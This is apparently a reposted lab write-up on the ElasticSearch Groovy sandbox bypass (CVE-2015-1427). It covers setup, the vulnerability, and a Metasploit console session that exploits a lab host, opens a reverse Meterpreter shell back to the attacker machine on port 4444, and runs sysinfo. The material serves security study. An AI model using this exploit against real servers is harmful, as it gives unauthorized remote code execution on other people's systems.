Lab - ElasticSearch Search Groovy Sandbox Bypass

来源：互联网发布：软件生命周期管理编辑：程序博客网时间：2024/05/02 02:02

Download: https://www.elastic.co/downloads/past-releases/elasticsearch-1-4-0

Elasticsearch is a search server based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.

Install

Please read the page.

elasticsearch can be started using:

$ bin/elasticsearch

On *nix systems, the command will start the process in the foreground.

Running as a daemon

To run it in the background, add the -d switch to it:

$ bin/elasticsearch -d

PID

The Elasticsearch process can write its PID to a specified file on startup, making it easy to shut down the process later on:

$ bin/elasticsearch -d -p pid $ kill `cat pid`

Exploit

This module exploits a remote command execution (RCE) vulnerability in ElasticSearch, exploitable by default on ElasticSearch prior to 1.4.3. The bug is found in the REST API, which does not require authentication, where the search function allows groovy code execution and its sandbox can be bypassed using java.lang.Math.class.forName to reference arbitrary classes. It can be used to execute arbitrary Java code. This module has been tested successfully on ElasticSearch 1.4.2 on Ubuntu Server 12.04.

msf exploit(search_groovy_script) > show options Module options (exploit/multi/elasticsearch/search_groovy_script):   Name       Current Setting  Required  Description   ----       ---------------  --------  -----------   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]   RHOST      192.168.1.102    yes       The target address   RPORT      9200             yes       The target port   SSL        false            no        Negotiate SSL/TLS for outgoing connections   TARGETURI  /                yes       The path to the ElasticSearch REST API   VHOST                       no        HTTP server virtual hostExploit target:   Id  Name   --  ----   0   ElasticSearch 1.4.2msf exploit(search_groovy_script) > run [*] Started reverse TCP handler on 192.168.1.100:4444 [*] Checking vulnerability...[*] Discovering TEMP path...[+] TEMP path on '/tmp'[*] Discovering remote OS...[+] Remote OS is 'Linux'[*] Trying to load metasploit payload...[*] Sending stage (46112 bytes) to 192.168.1.102[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.102:59238) at 2016-03-05 08:25:25 +0800[+] Deleted /tmp/rCrwvV.jarmeterpreter > sysinfo Computer    : labOS          : Linux 4.3.0-kali1-686-pae (i386)Meterpreter : java/javameterpreter >

References

https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/
https://github.com/XiphosResearch/exploits/tree/master/ElasticSearch
http://drops.wooyun.org/papers/5107

0 0